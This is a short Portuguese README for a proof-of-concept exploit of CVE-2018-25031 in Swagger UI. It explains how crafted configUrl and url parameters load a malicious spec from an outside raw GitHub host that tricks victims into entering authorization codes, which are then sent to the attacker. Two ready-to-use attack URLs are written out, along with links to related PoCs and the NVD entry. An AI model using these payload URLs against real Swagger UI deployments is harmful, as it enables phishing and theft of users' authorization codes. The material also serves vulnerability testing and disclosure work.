
Exploit de prova de conceito para CVE-2018-25031 (XSS no Swagger UI) que exfiltra códigos de autorização via parâmetros configUrl/url manipulados.
Um POC simples (CVE-2018-25031) que engana a vítima para que insira o código de autorização, que é então enviado ao atacante.
Você pode usá-lo com a Vulnerabilidade XSS https://github.com/VictorNS69/swagger-ui-xss
É necessário encontrar o parâmetro e atribuir o arquivo correto: para configUrl, o arquivo JSON, e para url, o arquivo YAML.
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031